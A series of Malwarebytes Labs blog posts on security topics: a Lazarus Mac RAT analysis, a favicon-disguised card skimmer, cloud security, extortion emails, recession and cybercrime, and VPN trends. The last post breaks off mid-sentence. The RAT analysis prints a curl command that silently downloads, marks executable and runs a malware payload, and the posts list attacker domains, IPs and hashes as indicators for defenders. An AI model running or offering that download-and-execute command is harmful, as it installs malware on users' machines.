The Socks plugin is the new, seventh plugin added to this Mac Rat. It is similar to the RP2P plugin and acts as an intermediary to direct the traffic between bot and C&C infrastructure. It uses Socks4 for its proxy communications.

Figure 17: Socks4 Network Communications

C&C communication used by This Mac RAT is similar to the Linux variant. To connect to the server, the application first establishes a TLS connection and then performs beaconing and finally encrypts the data sent over SSL using the RC4 algorithm.

Figure 18: Traffic generated by the Application (.mina) Figure 19: TLS connection

Both Mac and Linux variants use the WolfSSL library for SSL communications. WolfSSL is an open-source implementation of TLS in C that supports multiple platforms. This library has been used by several threat actors. For example, Tropic Trooper used this library in its Keyboys malware.

Figure 20: WolfSSL

The command codes used for beaconing are the same as the codes used in Linux.dacls. This is to confirm the identity of the bot and the server.

Figure 21: Beconing

The RC4 key is generated by using a hard-coded key.

Figure 22: RC4 Initialization Variants and detection

We also identified another variant of this RAT which downloads the malicious payload using the following curl command:

curl -k -o ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev

We believe this Mac variant of the Dcals RAT is associated with the Lazarus group, also known as Hidden Cobra and APT 38, an infamous North Korean threat actor performing cyber espionage and cyber-crime operations since 2009. 

The group is known to be one of the most sophisticated actors, capable of making custom malware to target different platforms. The discovery of this Mac RAT shows that this APT group is constantly developing its malware toolset.

Malwarebytes for Mac detects this remote administration Trojan as OSX-DaclsRAT.

IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001

The post New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Credit card skimmer masquerades as favicon

Wed, 05/06/2020 - 15:15

Malware authors are notorious for their deceptive attempts at staying one step ahead of defenders. As their schemes get exposed, they always need to go back to their bag of tricks to pull out a new one.

When it comes to online credit card skimmers, we have already seen a number of evasion techniques, some fairly simple and others more elaborate. The goal remains to deceive online shoppers while staying under the radar from website administrators and security scanners.

In this latest instance, we observed an old server-side trick combined with the clever use of an icon file to hide a web skimmer. Threat actors registered a new website purporting to offer thousands of images and icons for download, but which in reality has a single purpose: to act as a façade for a credit card skimming operation.

The suspicious favicon

This latest case started with an image file displayed on the browser’s tab often used for branding or identifying a website, also known as a favicon.

Figure 1: Some favicons from popular websites

While reviewing our crawler logs, we noticed requests to a domain called myicons[.]net hosting various icons and, in particular, favicons. Several e-commerce sites were loading a Magento favicon from this domain.

Figure 2: A favicon.png for the Magento CMS

This in itself is not particularly suspicious. However, we noticed that the domain myicons[.]net was registered just a few days ago and was hosted on a server (83.166.244[.]76) that was previously identified as malicious. In a blog post, web security company Sucuri disclosed how this host was part of a web skimming campaign using time-based domain names.

In addition, we found that the person who registered myicons[.]net stole all the content from a legitimate site hosted at; and they did it in the most simple way—by loading it as an iframe:

<iframe src="" width="100%" height="1015px" frameborder="0" align="left"> Figure 3: Decoy site with original site

Our suspicions were that the favicon.png file was malicious and perhaps using stenography to hide JavaScript code. But this was not the case. The image was properly formatted, with no extra code inside.

Figure 4: Suspicious image file turns out to be clean Conditional server-side response

To better understand what was going on before ruling this out as a false alert, we examined how this file was served in the context of an online purchase. Low and behold, when visiting the checkout page of a compromised Magento website, the innocent favicon.png turned into something else altogether.

Figure 5: The same web request with a referer including the ‘checkout’ keyword

Instead of serving a PNG image, the malicious server returns JavaScript code that consists of a credit card payment form. This content is loaded dynamically in the DOM to override the PayPal checkout option with its own drop down menu for MasterCard, Visa, Discover and American Express.

Figure 6: Malicious content hijacks default payment form “Ant and cockroach” skimmer

This skimmer may be familiar to some under the nickname “ant and cockroach.” It is somewhat unique in that it is customized for English and Portuguese checkout forms.

In addition to JavaScript code, it contains HTML that will be injected into the checkout page of compromised stores. The idea is to blend in so that shoppers don’t notice anything suspicious.

Figure 7: Rogue HTML form injected into checkout page

While web skimmers primarily focus on credit card data, they typically also collect additional personal information about the victims including name, address, phone number, email.

Figure 8: Data fields collected by the skimmer

That data is encoded and then sent back to the criminals. For client-side skimmers, the exfiltration domain could be another hacked site or a malicious site registered strictly for this purpose.

Figure 9: Exfiltration code sending data back to the criminals

Here the exfiltration domain is psas[.]pw and resides on known criminal infrastructure on the IP address 83.166.242[.]105. Back in March we described a campaign abusing Cloudflare’s Rocket Loader script which we believe is tied to the same threat group.

One of many web skimmer campaigns

Given the decoy icons domain registration date, this particular scheme is about a week old but is part of a larger number of ongoing skimming attacks.

Malwarebytes users are protected via our real-time web security module available in both Malwarebytes for Windows and via our Browser Guard extension available for both Google Chrome and Mozilla Firefox.

Figure 10: Malwarebytes Browser Guard blocking data exfiltration Indicators of Compromise

Skimmer URL, domain, IP and SHA256

myicons[.]net/d/favicon.png myicons[.]net 83.166.244[.]76 825886fc00bef43b3b7552338617697c4e0bab666812c333afdce36536be3b8e

Exfiltration domain and IP

psas[.]pw 83.166.242[.]105

The post Credit card skimmer masquerades as favicon appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: cloud-delivered security

Tue, 05/05/2020 - 15:15

As a counterpart to security for your assets in the cloud, you may also run into solutions that offer security from the cloud. These solutions are generally referred to as cloud-delivered security. Cloud-delivered security is sometimes called security-as-a-service which we will avoid here as it might be confused with the more generally used term Software-as-a-Service (SaaS).

Types of cloud-delivered security

It is not hard to imagine several types of cloud-delivered security:

  • Definitions or rules for detection are in the cloud
  • Security controls and logs for systems that in multiple places are located in the cloud
  • Suspicious files that are not recognized are uploaded to the cloud for closer inspection
  • The security applications run completely or partially in the cloud and check on the security health of the physical systems

With detection criteria in the cloud there is only one update needed for new definitions and not for every individual system.

Controls and logs in the cloud enable security management to be the spider in the web from virtually anywhere.

The closer inspection of the suspicious file can be done by the security provider themselves or use a more general resource like VirusTotal.

Using containerization, security applications can be shared amongst different systems, even if they are running a different operating system.

Models of cloud-delivered security

Besides these different types, there are also three basic cloud delivery models:

  • Software as a Service (SaaS)
  • Platform as a Service (PaaS)
  • Infrastructure as a Service (IaaS)

SaaS clients use applications supplied by a service provider. SaaS does not allow or require any control of the cloud platform or the infrastructure. This can be beneficial to some organizations while others would like at least some control.

PaaS users can deploy consumer-created or acquired applications using programming languages and tools supported by the provider’s content policies. This both limits the choices but it also enhances security.

IaaS is interesting for more sophisticated and demanding users as it allows them to deploy and run arbitrary software. This could apply to both operating systems and applications.

The main difference for these three delivery models is the internal organization of the cloud infrastructure. For the user this mainly results in a degree of freedom in how to use the infrastructure.

Cloud-enabled architecture

A cloud-enabled architecture is by definition built in the cloud and delivered as a service. This means it provides a platform that you can easily deploy, and it will help you minimize the need for costly appliances and backhauling.

Even more than when you are starting to use cloud enabled architecture, moving existing critical capabilities such as endpoint security into the cloud requires careful consideration of a wide range of privacy and security assurances. But sometimes the choice between the two isn’t one that is available. Circumstances do not always allow for the easy path of stepping into a readily prepared platform.

SaaS-based, cloud-enabled architecture should provide customers with a system that can be operational in minutes and requires no on-premise infrastructure. It may combine multiple security functions into one solution, so you can extend protection to devices, remote users, and distributed locations anywhere.

Integrated cloud security service benefits:

  • Flexible security protection on and off network
  • Consistent policies across remote locations
  • Easier to scale on a subscription-based model
Benefits of cloud-delivered security

There are several benefits of cloud-delivered security:

  • The protection will benefit all cloud resources and the SaaS applications
  • It makes it easier to get insight into mobile users, application usage, and overall traffic
  • Enhancement of management efficiency because it can be centralized and done with minimal effort
  • Significant improvement in discovered malware incidents and attempted breaches
  • As a result, a reduction of security related downtime
  • Ease of gathering sufficient audit evidence
What to look for in cloud-delivered security

There are several aspects organizations may be looking for in a cloud security solution. These can vary by type of organization and their priorities. In no particular order these may be:

  • Assistance from security vendors
  • Cloud administration and management
  • Scalability and cost efficiency
  • Protect all critical infrastructure
  • Extra features

Security should work for the organization and not the other way around. Security vendors are expected to assume a stronger, more active role in managing and helping the client to maintain the protection of their systems and network(s). Cloud-delivered security allows the organization to focus on their business and abandon or reduce the do-it-yourself security approach.

For businesses looking to simplify their security management through the elimination of hardware, reduced administration, and centralized management, the cloud is the most viable option. And it allows the vendor or a provider to perform remote administration and management.

Cloud-delivered services can dynamically grow and shrink based on the needs of the organization and you only pay for what you need based on usage. Moreover, it can also be less expensive to acquire since they are usually sold on a subscription basis, where payments are spread out over time.

To optimize the use of assistance, centralized management, and scalability, a cloud-delivered security solution should be designed to protect all critical infrastructure, applications, and data delivered as-a-service.

Usually organizations can add extra services or features to the security solution, which can include, for example, identity management, email security, and other features.

Possible drawbacks of cloud-delivered security

Some organizations may shy away from cloud-delivered security for various reasons.

Organizations may feel they have less control over the functionality of the security solution, which is not always justified as it will depend on the chosen model. And most of the times you will still be able to file feature requests with the vendor and work them out.

Organizations may have doubts about the privacy of the delivered technology and storage of logs in the cloud. But if you can’t trust your security vendor there is a worse problem that needs to be solved first.

Further, data residency can lead to compliance issues for some organizations in some countries. This absolutely should be researched before onboarding with a vendor. It would be a shame to engage in an onboarding process only to find out that there will be compliance issues.

Smaller businesses and cloud-delivered security

Smaller businesses can still profit from cloud-delivered security by acquiring it from a Managed Services Provider (MSP). Security vendors will provide MSPs with a cloud management console where they can keep an eye on all their customers. This enables the MSP to protect, monitor and remediate against security threats.

Stay safe everyone!

The post Explained: cloud-delivered security appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 27 – May 3)

Mon, 05/04/2020 - 15:17

Last week on Malwarebytes Labs, we looked at how secure the cloud is, understood why unexpected demand can influence an organization to consider their “just in time” (JIT) system, speculated on why the threat actors behind the Troldesh ransomware suddenly released thousands of decryption keys, preached the good news about VPN being mainstream, touched on the relationship between cybercrime and a challenged economy, and identified what users can do if they received an extortion email.

Other cybersecurity news
  • The season of threat actors banking on coronavirus continues as fake news sites spring up to promote a “pandemic survival book.” (Source: Avast Blog)
  • Cybersecurity experts warned small- to medium-sized businesses about an increase in targeted attacks, thanks to the pandemic (Source: TechRadar)
  • While internet users are using VPN all the more, experts have seen attacks on something probably no one has thought about protecting: the router. (Source: InfoSecurity)
  • Phishers targeted Zoom users yet again with spoofed meeting notifications that would likely cause them to panic and click the phishing link. (Source: Source: Bleeping Computer)
  • Payment card details owned by US and South Korean citizens were reportedly sold underground for $2M USD. (Source: Group-IB)
  • While governments have renewed interest into using contact tracing apps to help contain COVID-19, the interest in using Bluetooth attacks may naturally follow. (Source: ZDNet)
  • Israel’s National Cyber Directorate published an alert about attacks on supervisory control and data acquisition (SCADA) systems. (Source: Security Week)
  • Parking meter vendor CivicSmart was attacked by ransomware and had their data stolen. (Source: StateScoop)
  • Some ransomware gangs opted out of targeting hospitals. For some, it’s business as usual. Colorado hospital shut down by ransomware. (Source: Health IT Security)
  • OceanLotus APT is suspected to be behind an espionage campaign dubbed PhantomLance, which targeted specific victims in Southeast Asia. (Source: Threatpost)

Stay safe everyone!

The post A week in security (April 27 – May 3) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

What to do when you receive an extortion email

Fri, 05/01/2020 - 15:30

In the last few weeks, there has been an upswing in people receiving threatening, extortion email messages, demanding payment to avoid release of sensitive information. Most of the time, these emails are what we call “sextortion” emails, as they claim that malware on your computer has captured embarrassing photos of you through the webcam, but there can be other variants on the same theme.

These extortion emails are nothing new, but with the recent increase in frequency, many people are looking for guidance. If you have received such an email message and want to know how you should respond, you’re in the right place. Read on!

Extortion claims

These email messages are not all exactly the same, but they do have fairly common characteristics. Consider the following example:

This is fairly representative of many examples. It starts out by telling you that the scammer knows one of your passwords, and the password really IS one of your passwords, which immediately ratchets up the fear and puts you in a mindset to believe that the rest of the message is also true. (Hint: it is not.)

Next, it tells you that the scammer knows other things about you, including photos of you doing something embarrassing, captured through malware on the computer. The message threatens to send these photos to people you know. Some variants may not involve this kind of “sextortion,” but the general pattern of doing something damaging with data stolen from the user is the same.

In order to prevent this, the scammer demands to be paid, usually in a currency called Bitcoin. There’s usually a time limit given for the payment, to really put the pressure on and encourage fast action rather than seeking help.

Are the extortion claims true?

With one exception, none of this is true. There is no malware involved. The scammer does not have any of the claimed information. If you don’t pay the demanded sum, nothing bad will happen. For the most part, these messages can simply be ignored.

However, the one part that is true is the password—which is the part that makes everything else seem more believable. The password did not, however, come from malware on the computer. Instead, it came from a third-party data breach.

What happens is that a site you have an account on gets breached, and someone is able to extract a bunch of email addresses and passwords. How this happens is not particularly important for our purposes here, but the effect is that two pieces of your personal information may have been published to various “dark web” sites: your email address and a password used with an account associated with that email address.

This is very similar to someone writing your phone number on the wall in a bathroom stall: it becomes public knowledge, for anyone who knows where to look, and it can lead to a lot of harassment.

Once this information has become public knowledge, criminals can take these lists and send mass email messages to everyone on the list, including the password associated with their email message. This is the real source of the seed of truth in these messages, not the fictitious malware the scammers want you to believe you’re infected with.

So I can ignore this, right?

Well, yes and no. Yes, the threat itself is an empty one, since there’s no malware. However, there’s a real danger under the surface: you have a password that has become public knowledge!

If the password provided is an old one that you are no longer using, then you’re golden. You’ve got no need to do anything further. However, for many people, the password is one that is still in active use, and that presents a problem. This particular scammer decided to use the password to scare you, but there are other criminals out there who might decide to use it for more nefarious purposes, like taking over your online life!

To prevent this from happening, there are a few steps you’ll need to take.

Step 1: Change your password

First and foremost, on any account using the password that was provided, change your password. While you’re at it, though, let’s make sure that it’s a good strong one. The best passwords are long, random ones… for example, “vdBdq8GoDh8ELGm$qRdgXVTq.” The longer the better.

It’s also important to use a different password on every site. Because password breaches will always happen, if you use the same password on multiple sites, that can lead to a breach on one site making it possible for an attacker to access your accounts across many different sites.

Okay, I hear you. No, I’m not expecting you to memorize ridiculous passwords for every site you have an account on. There’s a solution to that problem.

Step 2: Use a password manager

A password manager is a program designed to remember your passwords for you. Password managers can keep a list of not just your passwords, but also what site you’ve used them on, the username you use to log in to that site, any security questions you use on that site, etc.

A password manager can be as simple as a notebook you keep in a drawer in your desk. Of course, that’s also something that can be read by anyone with access to your office, and it’s not something you can easily carry around with you.

Password managers more typically come in the form of software, which can encrypt your passwords with a single master password, help you share them between devices, and much more.

You may have a password manager right at your fingertips already, as some web browsers have them built in. Examples include iCloud Keychain in Safari, Google Password Manager in Chrome, and the Firefox Password Manager.

Safari’s password management settings

If you use a more obscure browser, don’t want to use the built-in password manager, or just need something more powerful, you can consider something like 1Password or Lastpass.

Whatever fits your particular needs, use it. A password manager is the only way you can realistically have long, strong passwords that are different on every site. Your password manager’s “master” password becomes the only password you need to remember.

Creating a master password for your password manager follows the same, simple rules for your regular passwords—the longer the better. Since you’ll be typing this password in regularly, it could be easier to make a passphrase, which is a string of words that should have no direct meaning to you. Avoid birthdates and street addresses and lean into the chaos of your brain’s random word generator: something like “cantankerousbuffalopotteryhypothesis.”

Whoa, hold on a minute! Don’t walk away yet. Having good passwords and a way to store them is only a small part of the battle. After all, a good password is no good as soon as the site gets breached by a hacker and spills all its passwords. Believe it or not, there’s something else beyond the password.

Step 3: Use two-factor authorization

Two-factor authorization (abbreviated 2FA) is some kind of secondary piece of information, in addition to a password, that can be required for you to log into a website. These typically are some kind of code—most commonly four or six digits—that you must enter during the login process.

The most common way to receive these codes is via text message on your phone. However, they can also be codes that change every 30 seconds, which are generated by a variety of different apps, such as Authy, Google Authenticator, or some more full-featured password managers. These are more secure than texted codes, but also less commonly supported, and codes sent to your phone via text message are better than nothing.

2FA token generated by Authy on an iPhone

Whatever type your accounts support, use it. It can take some time to set this up these days, when people often have a LOT of accounts, so just take it a few at a time until you’re done.

For help figuring out what kinds of 2FA a site supports see the Two Factor Auth site. You can search this site for the site you’re interested in, and it will tell you what types of 2FA it supports (SMS and Software Token being the two types described above), and link you to that site’s documentation for how to set up 2FA.

For more information about 2FA, see Duo Security’s Two-Factor Authentication: The Basics.

Step 3a: What if there’s no 2FA?

Some sites don’t support 2FA, instead only supporting something like security questions… you know, “What’s the name of your first pet,” or “What street did you live on growing up,” and any number of other similar questions. Here’s the problem with these questions: they’re easy to guess, and the information may be public knowledge.

So, here’s what you do if security questions are all you have to secure a site: lie! Never, ever use true answers to security questions. Instead, make something up. For example, maybe say your first car was a “Millennium Falcon.” Or maybe you drove an “avocado toast.” Even better, say you drove a “dknO6RF%an!Fdke8.”

By now, I’m sure you’re not asking how you’re supposed to remember these ridiculous answers, because you know what the answer will be already: use your password manager. Most password managers support arbitrary notes, so add both the questions and the nonsensical answers to a note for that login in your password manager.

Wrapping up

If you skipped to the end without reading the details (we hope you did not), here’s the tl;dr: these messages are fake, there is no malware involved, and the only thing to be concerned about is the fact that one of your passwords is floating around in cyberspace.

Once you have followed all the instructions above to secure your online accounts, you’ll have nothing left to do, other than mark the message as junk and delete it (if you haven’t already).

Keep in mind that no antivirus software can prevent you from seeing these types of extortion messages. Email systems or clients that do junk mail (spam) filtering can help to catch some of these, but they cannot be relied on to catch all of them. These scammers are sneaky, and are good at evading junk mail filtering.

The fact that you keep receiving these extortion messages does not represent a security issue, and you do not need to be afraid of these thugs. They are only a threat to your wallet, and only if you fall for their tricks and send them money. Otherwise, they cannot do you any harm… so long as you’ve secured your accounts so they can’t use your leaked password against you.

The post What to do when you receive an extortion email appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cybersecurity and the economy: when recession strikes

Thu, 04/30/2020 - 15:11

Cybercrime and the economy have always been intertwined, but with COVID-19 on the road to causing a seemingly inevitable global recession, many are asking what, exactly, will the impact be on cybercrime. Will criminals step up and increase malware production, ramp up phishing attacks, do whatever it takes to pull in some cash? Or will it cause a little downturn in malware making and other dubious dealings?

Cyber recession: setting the scene

One of our key points of observation would be back in 2009, during the last global recession. While searching for information, one of the flashpoints which kept coming up was a paper put together by a team of researchers from around the world called Crime online: cybercrime and illegal innovation. Almost every article which came back to me referenced it in some way, and it was front and centre for every writeup. It’s so pervasive that even articles written in the last 12 months tend to link it when talking about the impact of recessions on professional computer criminals.

The Telegraph, Metro, OneIndia and many more all focused on the impact the recession would have as per the research paper. The only problem? Having read it, the paper mentions a recession 3 times, 2 of which are the same sentence reused stating that a global recession will likely increase the chances of people moving into cybercrime. And for all the lasting impact references to this paper have had down the years, that’s essentially what all of the linkage is based on: someone saying “here comes the cybercrime recession, probably”.

The Past: Making predictions

Mostly, it’s a very solid and wide-ranging paper covering a large range of threat developments, from credit card fraud and phishing to malware authoring and “value chain analysis.” All very interesting, but outside of many claims that technology x or people getting better at y would result in probable increases in z, nothing really leapt out at me to say, “recession is going to explode bad activity online and this is why”. Was it possible people on the receiving end of the presumed press release saw the single line about recession and pinned their entire piece around it? Who knows, but there didn’t seem to be an awful lot to go on.

Putting the puzzle together

In fairness, it’s not just that one research paper taking up the entirety of 2009’s “here comes the recession hacker boom” content. It was up for discussion and there’s no harm in considering the problem. A panel back in 2009 talked about how a recession creates “more cybercriminals” who then go on to do a lot more cybercriminaling. There’s a fair bit of assumption at work here; that a big slice of people hit by a recession will automatically turn to crime, and computer crime at that. If resources are tight and money is short, if people are so physically impacted by a recession that they need to turn to crime to survive, will they:

  1. Invest time, electricity, and stamina they may not have on crash course hacking, malware, phishing, digging around on forums for someone—anyone—to help them so they can maybe go off and rip someone off online with no guarantee any of it will work; or
  2. Go out and steal some food or break into physical objects such as cars?

Personally, I’d be in Camp B all the way. Camp A seems like incredibly slim vanishing returns all round.

Wages down, crime up? Not so simple

When a recession hits, do criminals come creeping out of the woodwork? More to the point, do we end up with whole new waves of criminals? We have a few data points we can draw on for this. When major recessions and downturns have struck, crime rates can actually fall significantly. Apart from anything else, it’s quite tricky for career burglars to go about their business when economic factors are keeping people at home.

Throw a global pandemic into the mix which relies on as many people as possible staying indoors whether working or not, and it’s time to get a new criminal enterprise. The question is what, specifically, that criminal enterprise would involve. Computers or something else?

Driving the direction of technological attacks

While many folks seem to think cybercrime is the perfect place to go for replacement crime activities, the reality is it’s not quite that straightforward. In more normal times, the shifts inside online crime as a whole are represented by an ebb and flow towards different types of attack as opposed some sort of wholesale digital stampede to do something differently.

For a while now, we’ve seen consumer detections decrease while their business counterparts go up due to the juicy stuff being locked away behind corporate firewalls. Now, with so many people working from home, we expect to see cybercriminals modify their approach somewhat and start going back to poking around home computers (or at least, work computers suddenly on a home network).

Here comes the massive caveat:

It’s worth mentioning that for every “crime goes down during a recession” piece you know of, you’ll always find a few others claiming the opposite. You want confusing? Have fun with the first page of search results in Google should you want to do some digging of your own:

Click to Enlarge

Criminology and sociology aren’t my field of expertise, and I don’t pretend they are. I’m just highlighting the potentially significant shifts in data analysis for anyone trying to figure out the cybercrime / recession link, because even the non-cybercriminal data seems to have a hard time being stacked up one way or another depending on which data is used and who is telling the story.

What about good old infection / attack numbers? Is it even possible to dust off a big book of figures from more than a decade ago?

Playing the numbers

The answer is “sort of”, and “very cautiously”. Cybercrime from last year tends to be somewhat old hat, never mind something from 5 or 10 years ago which often looks as though it’s landed here from another planet. Everything and anything could potentially be different, from infection types, to spreading techniques, to operating systems and security tools, even down to the way everybody from security vendors and governments tally up their figures.

Having said that, there are some interesting snippets of information buried in the pile. The Great Recession hit in 2009, after the build-up of the 2007-08 financial crisis. A UKGOV-hosted cybercrime report from 2013 notes that many aspects of internet fraud dipped around the time of the year-long recession, with higher tallies surrounding it depending on attack type.

“Internet enabled card-not-present fraud” (catchy!) was at around £131 million loss costs recorded in 2010, starting off at a peak of about £181 million in 2008. This is, however, a partial estimate, and online banking fraud hit a peak of £59.7 million in the year of the recession before collapsing to £39.6 million by 2012. Even so, Financial Fraud Action reported “just” 50k phish banking phishes in 2009 and 256k by 2012.

The malware explosion of 2012 onwards

Numbers are somewhat tricky to come by, but not impossible. Although this AV Test chart for overall malware development begins with 2011, you can see the full chart in this 2015/16 PDF document which ranges from 2005 at 1.7 million all the way up to 2016 hitting some 578 million(!) From 2007 onwards, the new figure increases year on year from anything between 10 to 20 million, with nothing unusual about 2009 compared to the others. In fact, it isn’t until 2012/13 that the numbers begin to explode into the stratosphere. The one thing I mainly remember about 2009 in terms of security was prevalence of worms: Sality, Conficker, and others.

In terms of *new* malware created per year, another AV Test report (2017/18) is similarly illuminating. Once again, 2009 isn’t particularly notable whereas 2012 seems to be the point where things kick into high gear, remaining that way until 2016 when things take a small dip.

Elsewhere, though, different types of fraud received a boost. Internet fraud losses were up to the tune of 33% in 2008, though your mileage will vary with regards to taking the final year of the financial crisis and tying it specifically to the period of 2009 accepted as the recession itself. However you stack it up, it’s fair to say some types of crime would go up and some down, as expected – or at least, not explode the way you’d think it might.

Present: The cybers will get us

If we wind ourselves forward to the past few years, we see talk of cybercrime specifically being a potential cause for a possible recession. In 2018, the fear of a massive attack on banking systems worldwide was touted as the way we’d all be dragged into recession town, population: us. The way this was supposed to happen is as follows:

  1. Rogue nation state or someone with equivalent resources somehow causes a massive “cashout strike”, where a huge wave of fraudulent withdrawals happens simultaneously and this is on such a scale that the banks all fall over. Yes, this is quite speculative.
  2. A script kiddy does…something…malicious and everything breaks. This is even more speculative.

That’s, uh, pretty much it. The article itself mentions that the banks would probably return to normal once functionality is restored, and if you’re undercutting your own “this is bad” point with “actually not really” then in all fairness it’s probably not how civilization is brought to its knees.

Elsewhere, we have another prediction of cyber related recession antics from 2019. Once again, the trigger is going to be some sort of undefined bank exploit / attack where the financial sector comes crashing down around our ears. The fascinating part is that the article begins by stating that a recession is definitely going to happen “within 2 years”. Well, they were correct – but not for the reasons stated. As it turns out, the cybers getting us might have been a bit more preferable to what came along in 2020…

(Potential) future: 2020 and beyond

As we’ve seen so far, computer criminals deciding to shuffle the deck and throw it out the window is primarily based on what-if scenarios ranging from unlikely and incredibly vague to unlikely and a bit less vague. Dusting off the crystal ball is an interesting exercise, but the reality of the situation is that the current financial meltdown came hand in hand with a virus of the non-digital kind.

Right now, we can’t move for conflicting reports during the actual pandemic itself. On the one hand, you have Ransomware authors claiming they won’t target hospitals during the pandemic. This isn’t entirely altruistic; they must know hammering health services will attract unnecessary legal attention in the fallout. Having said that: here’s a bunch of health services under fire from hack attacks during the pandemic. As before, some types go down, some go up. It isn’t uniform and very difficult to make sense of so much conflicting data.

Elsewhere, we have organizations reporting “five-fold increases” in cyber-attacks. By the same token, we have entities such as Microsoft and NCSC claiming the overall levels of cyber-crime aren’t going up. Criminals don’t seem to be making more money off the back of COVID-19 either.

That’s all well and good for scammers riding the coat-tails of the pandemic in the here and now, and numbers could change dramatically as time goes on. How about any future-based, lasting recession?

My entirely unscientific guess – and that’s all we can do, guess – is that even accounting for any new recession, cybercrime will just keep on keeping on and expand or contract at its own pace if it follows the same general pattern we saw in 2009. We’re in an unprecedented situation for technology, and may need to wait till the smoke clears to figure out what we do next. Believe me when I say I’m as fascinated as you are to see where it ends up.

Let’s just hope it’s a little bit more preferable to what we have right now.

The post Cybersecurity and the economy: when recession strikes appeared first on Malwarebytes Labs.

Categories: Techie Feeds

VPNs are mainstream, which is good news

Wed, 04/29/2020 - 15:15

Virtual private networks (VPNs) have been growing in popularity for the last three years, a notable trend revealed in a collaborative report [PDF] by Top10VPN and GlobalWebIndex. This year is no different.

When a majority of the world’s internet users are in isolation due to the COVID-19 global pandemic, the increase in VPN usage is likely and expected, especially with so many people moving regular work from offices to their very homes. VPNs are best used in this time when employees cannot be physically within office premises to securely connect and access sensitive files, local apps, and other internal resources they need to do their job.

A jump in work-from-home employees isn’t the only reason why VPNs nowadays are in high demand. If anything, its steady growth was suddenly sped up by the effects of the current pandemic, introducing a historical spike in usage while internet users are thrust to a “new normal” when it comes to living life closer to family and away from colleagues, extended family, friends, and strangers.

However, there are other factors at play when it comes to motivations for using VPNs. The report entitled “The Global VPN Usage Report 2020” sheds a light on these and more. Let’s take a look.

Current VPN usage trend

Why use VPNs?

More than 30 percent of internet users are now using VPNs, with the heaviest users being in Asia and the Middle East & Africa regions. Specifically, Indonesia and India—61 percent and 45 percent, respectively—have the biggest number of VPN users compared to other countries. If you may recall, the Indonesian government have made attempts to filter content their citizens see online, especially on social media platforms like Facebook, Twitter, and Reddit. The use of certain communication channels, such as WhatsApp, were also restricted.

Both the Middle East & Africa (MEA) and the Asia Pacific (APAC) regions are heavy users of VPN. (Courtesy of Top10VPN and GlobalWebIndex)

It’s not unusual to say that some VPN growth actually stems from attempts to enact censorship over a population. Note that while VPN usage is high in areas where government repression is heaviest, these are also the countries where the use of VPN is legal.

Perhaps surprisingly, countries in democratic countries like Australia (69 percent) and the Netherlands (76 percent) have seen a notable market growth over a three-year period.

“In 2017, the Netherlands introduced a law that gave the intelligence services the right to wiretap online communications around suspects on a large scale and store the data for a period of 3 years,” explains Pieter Arntz, malware intelligence researcher for Malwarebytes, regarding this trend, “For that reason, the law was called the “Sleepwet” (or dragnet law). Amnesty International and local privacy advocates made objections against the scale and the long retention period. Since the introduction, we have seen a big rise in the use of VPN’s in the Netherlands.”

A data retention law coming into effect that year in Australia is the likely trigger for citizens to start using VPNs.

The report also outlines other reasons why people use VPNs.

The paradigm has shifted. VPN users typically claim they want to access entertainment content—currently ranking as the 6th top reason—that they otherwise cannot normally access. (Courtesy of Top10VPN and GlobalWebIndex)

In some countries, government surveillance isn’t a massive concern. What makes their citizens opt to use VPNs is to hide their browsing activities from potential snoopers, of which might be their ISP, advertisers, or threat actors.

Who uses VPNs?

For every 10 internet user, 3 use VPNs, according to the report.

Below is a global profile of who uses VPNs based on demographic data collected for this study. A VPN user is typically:

  • Male (36 percent, compared to 26 percent female)
  • Young (average of 37 percent between Gen Y and Gen Z users, compared to only an average of 21 percent for Gen X and Baby Boomers) *
  • More educated (average of 37 percent between college/university students and post-graduate users, compared to users who are schooling at the age of 18 and below)
  • Mobile users (64 percent, compared to 62 percent of PC/laptop users)

*Older generations are notably catching up, though.

Heavy users in the APAC and MEA regions are young users who are “more urban and more affluent, relative to the rest of the population”. They are also more comfortable with digital tools.

What’s in a user’s VPN wish list?

Most users (72 percent) in the US and UK are using free VPNs compared to those who opted to pay (36 percent). For payers, the most common reason for this is to avoid the sharing of their information with third parties (54 percent).

When looking for a VPN, users prefer those with reliable connection (54 percent), that are easy to use (54 percent), quick (54 percent), has privacy/logging policies (43 percent), and reasonably priced (42 percent).

What attitudes or behaviors do VPN users have?

VPN users are more likely to be consistent with how they protect their online privacy than someone who doesn’t use a VPN. This means they use other measures like deleting browser cookies and using browsers that promote private browsing.

It also came out that internet users are at least aware that protecting their privacy online is important but don’t know how. Even those deemed privacy-conscious are mostly not using VPNs.

When it comes to frequency in use, users in the US and UK tend to use VPNs every day for their daily browsing activities, not just for more private browsing. Younger users in these regions also claim that they see VPNs, primarily, as a privacy tool.

The road to safer surfing

It’s always interesting to take note of trends, motivations, and even buying behavior. However, there are other points in the report that merit some highlights. For one, many users associate VPNs with the word “secure”, although as with all things occasionally this isn’t the case. This is particularly true for mobile devices.

When it comes to finding “the one” VPN for you, it is therefore no longer enough to just take other people’s word for it. It is more crucial than ever for users to go hands on and experience the products themselves. It is also important that users do a little investigative work about the company behind the software or service they were eyeing to try out. And when you do, please remember: Ask the right questions.

Good luck!

The post VPNs are mainstream, which is good news appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Threat actors release Troldesh decryption keys

Tue, 04/28/2020 - 17:08

[Update: Kaspersky has updated their ShadeDecryptor tool to include decryption for the keys released by “shade team”. You can download the tool and find instructions here.]

A GitHub user claiming to represent the authors of the Troldesh Ransomware calling themselves the “Shade team” published this statement last Sunday:

